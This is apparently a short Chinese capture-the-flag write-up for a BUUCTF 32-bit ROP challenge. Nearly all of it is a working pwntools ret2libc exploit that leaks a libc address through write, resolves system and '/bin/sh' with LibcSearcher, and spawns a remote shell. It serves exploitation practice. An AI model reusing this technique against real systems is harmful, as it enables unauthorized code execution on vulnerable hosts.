铁人三项(第五赛区)_2018_rop

最经典的ret2libc

点击查看代码

from pwn import *
from LibcSearcher import *
io=remote("node4.buuoj.cn",29696)
elf=ELF("./2018_rop")
write_plt=elf.plt["write"]
write_got=elf.got["write"]
payload="a"*(0x88+0x4)+p32(write_plt)+p32(0x80484c6)+p32(1)+p32(write_got)+p32(4)
io.sendline(payload)
write_addr=u32(io.recv())
hex(write_addr)
libc=LibcSearcher('write',write_addr)
libc_write=libc.dump('write')
libc_sys=libc.dump('system')
libc_bin_sh=libc.dump('str_bin_sh')
libcbase=write_addr-libc_write
sys_addr=libcbase+libc_sys
bin_sh_addr=libcbase+libc_bin_sh
payload='a'*(0x88+0x4)+p32(sys_addr)+"1234"+p32(bin_sh_addr)
io.sendline(payload)
io.interactive()